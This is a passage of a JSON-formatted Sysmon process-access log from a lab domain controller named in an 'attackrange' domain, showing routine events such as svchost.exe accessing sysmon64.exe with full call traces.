Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4910,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:59.943\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 1212\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-11C3-5F25-0000-001096CF0600}\r\nTargetProcessId: 4564\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:59.943","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"1212","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-11C3-5F25-0000-001096CF0600}","TargetProcessId":"4564","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:55:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4911,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:59.943\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:59.943","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4912,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:59.943\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:59.943","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4913,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:59.943\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:59.943","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4914,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:59.943\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:59.943","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4915,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:59.943\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:59.943","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4916,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:59.943\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:59.943","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4917,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:59.943\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:59.943","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4918,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:59.943\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 